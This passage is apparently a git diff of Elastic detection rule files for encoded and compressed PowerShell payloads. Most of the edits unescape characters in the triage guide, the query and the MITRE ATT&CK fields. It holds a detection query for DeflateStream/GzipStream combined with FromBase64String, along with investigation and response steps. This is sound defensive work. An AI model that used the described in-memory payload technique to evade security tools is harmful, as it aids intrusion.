FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Payload Encoded and Compressed\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can embed compressed and encoded payloads in scripts to load directly into the memory without touching the disk. This strategy can circumvent string and file-based security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n (\n \"System.IO.Compression.DeflateStream\" or\n \"System.IO.Compression.GzipStream\" or\n \"IO.Compression.DeflateStream\" or\n \"IO.Compression.GzipStream\"\n ) and\n FromBase64String\n ) and not \n (user.id:(\"S-1-5-18\" or \"S-1-5-19\") and\n file.directory: \"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection\\\\Downloads\")\n", "related_integrations": [ { @@ -52,7 +52,7 @@ ], "risk_score": 47, "rule_id": "81fe9dc6-a2d7-4192-a2d8-eed98afc766a", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_108.json b/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_108.json index 1fab5a63621..bfe545ff74b 100644 --- a/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_108.json +++ b/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_108.json @@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "PowerShell Suspicious Payload Encoded and Compressed", - "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Payload Encoded and Compressed\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can embed compressed and encoded payloads in scripts to load directly into the memory without touching the disk. This strategy can circumvent string and file-based security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Payload Encoded and Compressed\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can embed compressed and encoded payloads in scripts to load directly into the memory without touching the disk. This strategy can circumvent string and file-based security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n (\n \"System.IO.Compression.DeflateStream\" or\n \"System.IO.Compression.GzipStream\" or\n \"IO.Compression.DeflateStream\" or\n \"IO.Compression.GzipStream\"\n ) and\n FromBase64String\n ) and not \n (user.id:(\"S-1-5-18\" or \"S-1-5-19\") and\n file.directory: \"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Protection\\\\Downloads\")\n and not user.id : \"S-1-5-18\"\n", "related_integrations": [ { @@ -52,7 +52,7 @@ ], "risk_score": 47, "rule_id": "81fe9dc6-a2d7-4192-a2d8-eed98afc766a", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_109.json b/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_109.json index 4eb40f76037..239e0712f89 100644 --- a/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_109.json +++ b/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_109.json @@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "PowerShell Suspicious Payload Encoded and Compressed", - "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Payload Encoded and Compressed\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can embed compressed and encoded payloads in scripts to load directly into the memory without touching the disk. This strategy can circumvent string and file-based security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Payload Encoded and Compressed\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can embed compressed and encoded payloads in scripts to load directly into the memory without touching the disk. This strategy can circumvent string and file-based security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately outside engineering or IT business units. As long as the analyst did not identify malware or suspicious activity related to the user or host, this alert can be dismissed.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text : (\n (\n \"System.IO.Compression.DeflateStream\" or\n \"System.IO.Compression.GzipStream\" or\n \"IO.Compression.DeflateStream\" or\n \"IO.Compression.GzipStream\"\n ) and\n FromBase64String\n ) and\n not file.path: ?\\:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Windows?Defender?Advanced?Threat?Protection\\\\\\\\Downloads\\\\\\\\* and\n not user.id : \"S-1-5-18\"\n", "related_integrations": [ { @@ -52,7 +52,7 @@ ], "risk_score": 47, "rule_id": "81fe9dc6-a2d7-4192-a2d8-eed98afc766a", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/81fe9dc6-a2d7-4192-a2d8-eed98afc766a_110.json 